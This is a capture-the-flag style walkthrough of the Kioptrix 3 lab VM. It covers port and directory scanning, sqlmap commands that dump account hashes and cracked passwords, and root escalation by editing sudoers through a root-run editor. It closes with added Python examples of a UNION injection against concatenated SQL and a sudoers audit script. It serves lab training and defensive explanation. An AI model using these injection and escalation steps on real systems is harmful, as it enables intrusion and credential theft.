Kioptrix VM3
Kali IP 192.168.1.128
Target IP 192.168.1.132
This target needs a hosts entry on the attacking machine; otherwise the web page does not load completely.
Port scan
sudo nmap --min-rate 10000 -p- 192.168.1.132
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-28 09:06 CST
Nmap scan report for bogon (192.168.1.132)
Host is up (0.0021s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
sudo nmap -sT -sV -O -p22,80 192.168.1.132
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-28 09:07 CST
Nmap scan report for bogon (192.168.1.132)
Host is up (0.00038s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
MAC Address: 00:0C:29:12:6B:8E (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
sudo nmap -sU -p22,80 192.168.1.132
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-28 09:08 CST
Nmap scan report for bogon (192.168.1.132)
Host is up (0.00032s latency).
PORT STATE SERVICE
22/udp closed ssh
80/udp closed http
Visit the web page
There is a login page, and the site is built with LotusCMS. Look up the details of this CMS for previously disclosed vulnerabilities, and scan the directories at the same time.
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Aug 28 09:13:34 2023
URL_BASE: http://192.168.1.132/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.132/ ----
==> DIRECTORY: http://192.168.1.132/cache/
==> DIRECTORY: http://192.168.1.132/core/
+ http://192.168.1.132/data (CODE:403|SIZE:324)
+ http://192.168.1.132/favicon.ico (CODE:200|SIZE:23126)
==> DIRECTORY: http://192.168.1.132/gallery/
+ http://192.168.1.132/index.php (CODE:200|SIZE:1819)
==> DIRECTORY: http://192.168.1.132/modules/
==> DIRECTORY: http://192.168.1.132/phpmyadmin/
+ http://192.168.1.132/server-status (CODE:403|SIZE:333)
==> DIRECTORY: http://192.168.1.132/style/
---- Entering directory: http://192.168.1.132/cache/ ----
+ http://192.168.1.132/cache/index.html (CODE:200|SIZE:1819)
---- Entering directory: http://192.168.1.132/core/ ----
==> DIRECTORY: http://192.168.1.132/core/controller/
+ http://192.168.1.132/core/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.1.132/core/lib/
==> DIRECTORY: http://192.168.1.132/core/model/
==> DIRECTORY: http://192.168.1.132/core/view/
---- Entering directory: http://192.168.1.132/gallery/ ----
+ http://192.168.1.132/gallery/index.php (CODE:500|SIZE:5650)
==> DIRECTORY: http://192.168.1.132/gallery/photos/
==> DIRECTORY: http://192.168.1.132/gallery/themes/
---- Entering directory: http://192.168.1.132/modules/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.132/phpmyadmin/ ----
+ http://192.168.1.132/phpmyadmin/favicon.ico (CODE:200|SIZE:18902)
+ http://192.168.1.132/phpmyadmin/index.php (CODE:200|SIZE:8136)
==> DIRECTORY: http://192.168.1.132/phpmyadmin/js/
==> DIRECTORY: http://192.168.1.132/phpmyadmin/lang/
+ http://192.168.1.132/phpmyadmin/libraries (CODE:403|SIZE:340)
+ http://192.168.1.132/phpmyadmin/phpinfo.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.1.132/phpmyadmin/scripts/
==> DIRECTORY: http://192.168.1.132/phpmyadmin/themes/
---- Entering directory: http://192.168.1.132/style/ ----
+ http://192.168.1.132/style/admin.php (CODE:200|SIZE:356)
+ http://192.168.1.132/style/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.1.132/core/controller/ ----
+ http://192.168.1.132/core/controller/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.1.132/core/lib/ ----
+ http://192.168.1.132/core/lib/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.1.132/core/model/ ----
+ http://192.168.1.132/core/model/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.1.132/core/view/ ----
+ http://192.168.1.132/core/view/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.1.132/gallery/photos/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.132/gallery/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.132/phpmyadmin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.132/phpmyadmin/lang/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.132/phpmyadmin/scripts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.132/phpmyadmin/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Mon Aug 28 09:14:12 2023
DOWNLOADED: 46120 - FOUND: 17
Opening every directory shows error messages echoed in the responses, which expose the physical path on disk.
Found another login form
http://192.168.1.132/phpmyadmin
Leave that for now and try the exploit found earlier, 18565.rb
With this vulnerability in msf you get a shell as the www account straight away; the privilege escalation afterwards is the same as the steps below.
Back on the phpmyadmin side, the default account with an empty password can log in, but there is no sensitive data and the query has no write permission.
Also found that the main page allows directory traversal, and used it to read passwd.
http://192.168.1.132/gallery/gallery.php?id=1
Fed it to sqlmap, which dumped the usernames and passwords
sqlmap -u http://192.168.1.132/gallery/gallery.php?id=1 --dbs
sqlmap -u http://192.168.1.132/gallery/gallery.php?id=1 -D gallery --tables
sqlmap -u http://192.168.1.132/gallery/gallery.php?id=1 -D gallery -T dev_accounts --columns
sqlmap -u http://192.168.1.132/gallery/gallery.php?id=1 -D gallery -T dev_accounts -C "id,username,password" --dump
Result:
+----+------------+---------------------------------------------+
| id | username | password |
+----+------------+---------------------------------------------+
| 1 | dreg | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r) |
| 2 | loneferret | 5badcaf789d3d1d09794d8f021f40f0e (starwars) |
+----+------------+---------------------------------------------+
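The dump above works because the id parameter of gallery.php is spliced into the SQL text, so one crafted value turns a photo lookup into a read of dev_accounts. As an added example (not LotusCMS code and not the VM's own gallery.php, which the page does not show), the Python below models that pattern against an in-memory SQLite database: photo_lookup_vulnerable concatenates the parameter the way an injectable handler does, photo_lookup_hardened validates the type and binds it. The photos table and its rows are constructed; the dev_accounts rows are the two from the page's dump, with the unsalted MD5 hashes exactly as dumped.

```python
import sqlite3

# Constructed sample data. dev_accounts holds the two rows from the page's
# sqlmap dump (unsalted MD5 hashes); photos is a hypothetical stand-in for
# whatever gallery.php?id=... really reads.
DEV_ACCOUNTS = [
    (1, "dreg", "0d3eccfb887aabd50f243b3f155c0f85"),
    (2, "loneferret", "5badcaf789d3d1d09794d8f021f40f0e"),
]
PHOTOS = [(1, "sunset.jpg"), (2, "beach.jpg")]


def make_db():
    """In-memory SQLite database standing in for the gallery database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE photos (id INTEGER PRIMARY KEY, filename TEXT)")
    conn.execute(
        "CREATE TABLE dev_accounts (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO photos VALUES (?, ?)", PHOTOS)
    conn.executemany("INSERT INTO dev_accounts VALUES (?, ?, ?)", DEV_ACCOUNTS)
    conn.commit()
    return conn


def photo_lookup_vulnerable(conn, raw_id):
    """Builds the statement by concatenating the request parameter.

    This is the injectable pattern: the parameter becomes part of the SQL
    text, so a value containing SQL changes the query instead of being
    compared against the id column.
    """
    sql = "SELECT id, filename FROM photos WHERE id = " + raw_id
    return conn.execute(sql).fetchall()


def photo_lookup_hardened(conn, raw_id):
    """Validates the type first, then passes the value as a bound parameter."""
    try:
        photo_id = int(raw_id)
    except (TypeError, ValueError):
        # Reject outright; do not try to strip or escape the input.
        raise ValueError("id must be an integer") from None
    sql = "SELECT id, filename FROM photos WHERE id = ?"
    return conn.execute(sql, (photo_id,)).fetchall()


def demo():
    """Run both lookups on a normal id and on a crafted one; return the outcomes."""
    conn = make_db()
    normal = "1"
    # One parameter value that makes the photo query also return dev_accounts rows.
    probe = "1 UNION SELECT id, username || ':' || password FROM dev_accounts"
    results = {
        "vulnerable_normal": photo_lookup_vulnerable(conn, normal),
        "vulnerable_probe": photo_lookup_vulnerable(conn, probe),
        "hardened_normal": photo_lookup_hardened(conn, normal),
    }
    try:
        photo_lookup_hardened(conn, probe)
        results["hardened_probe"] = "accepted"
    except ValueError:
        results["hardened_probe"] = "rejected"
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)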
The account names match the ones seen earlier in passwd; logging in over ssh with them succeeded.
Both accounts can log in. SUID privilege escalation failed, so gather information for privilege escalation instead.
lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 8.04.3 LTS
Release: 8.04
Codename: hardy
The loneferret account has files in its home directory; running the command as instructed there gives an error.
ls
checksec.sh CompanyPolicy.README
cat CompanyPolicy.README
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.
DG
CEO
sudo ht
Error opening terminal: xterm-256color.
Searched Baidu for a fix
loneferret@Kioptrix3:~$ export TERM=xterm
Run sudo ht again: a new terminal opens with a text editor running as root.
Press F3 to open the file, add /bin/bash to the current account's entry, save with F2 and exit.
sudo /bin/bash
root@Kioptrix3:~# id
uid=0(root) gid=0(root) groups=0(root)
Privilege escalation succeeded.
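The escalation above works because the sudoers policy lets loneferret run an interactive editor as root, and an editor running as root can write any file, /etc/sudoers included. The following is an added example, not from the page or the VM: a small Python audit that parses sudoers-style user specifications and flags rules that give a non-root user ALL, an editor or pager that runs interactively, or a negated ('!') command, which sudoers(5) itself documents as not an effective way to subtract commands. The sample policy is constructed to match the page's 'sudo ht' and is not the VM's real sudoers file; the parser handles plain user specifications only, not aliases or include directives.

```python
import re
from pathlib import Path

# Interactive programs that, once running as root, can write arbitrary files
# or drop to a shell. 'ht' is the editor the page's CompanyPolicy.README mandates.
INTERACTIVE_AS_ROOT = {"ht", "vi", "vim", "nano", "emacs", "less", "more", "sh", "bash"}

# Constructed sample policy modelled on the page's 'sudo ht'; not the VM's real file.
SAMPLE_SUDOERS = """\
Defaults env_reset
root       ALL=(ALL) ALL
%admin     ALL=(ALL) ALL
loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht
backup     ALL=(root) NOPASSWD: /usr/bin/rsync --server --sender /var/backups
"""

# user host=(runas) [TAG:]... cmd[, cmd...]
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*(?P<rest>.*)$"
)
TAG_RE = re.compile(r"^([A-Z]+):\s*")
SKIP_PREFIXES = ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias")


def parse_rule(line):
    """Parse one user-specification line into its parts; None for other lines."""
    line = line.split("#", 1)[0].strip()
    if not line or line.startswith(SKIP_PREFIXES):
        return None
    m = RULE_RE.match(line)
    if not m:
        return None
    rest, tags = m.group("rest"), []
    while (t := TAG_RE.match(rest)):          # peel off NOPASSWD:, SETENV:, ...
        tags.append(t.group(1))
        rest = rest[t.end():]
    commands = [c.strip() for c in rest.split(",") if c.strip()]
    return {
        "user": m.group("user"),
        "host": m.group("host"),
        "runas": m.group("runas") or "root",   # sudo's default target user
        "tags": tags,
        "commands": commands,
    }


def audit_sudoers(lines):
    """Return (user, command, reason) for each rule a reviewer should look at."""
    findings = []
    for raw in lines:
        rule = parse_rule(raw)
        if rule is None or rule["user"] == "root":
            continue
        for cmd in rule["commands"]:
            if cmd.startswith("!"):
                findings.append((rule["user"], cmd,
                                 "negated command: '!' exclusions are not a reliable restriction"))
                continue
            prog = cmd.split()[0]
            if prog == "ALL":
                findings.append((rule["user"], cmd, "ALL: unrestricted root"))
            elif Path(prog).name in INTERACTIVE_AS_ROOT:
                findings.append((rule["user"], cmd,
                                 f"{Path(prog).name} runs interactively as "
                                 f"{rule['runas']} and can edit any file"))
    return findings


if __name__ == "__main__":
    for user, cmd, reason in audit_sudoers(SAMPLE_SUDOERS.splitlines()):
        print(f"{user:12} {cmd:42} {reason}")
```

Run against the sample, the audit flags the %admin ALL rule, the negated su entry and the ht grant, and leaves the argument-restricted rsync rule alone. A policy that genuinely needs root file editing should grant sudoedit (sudo -e) on the specific file instead of an editor binary: sudoedit runs the editor as the invoking user and copies the result back, so there is no root editor to walk out of.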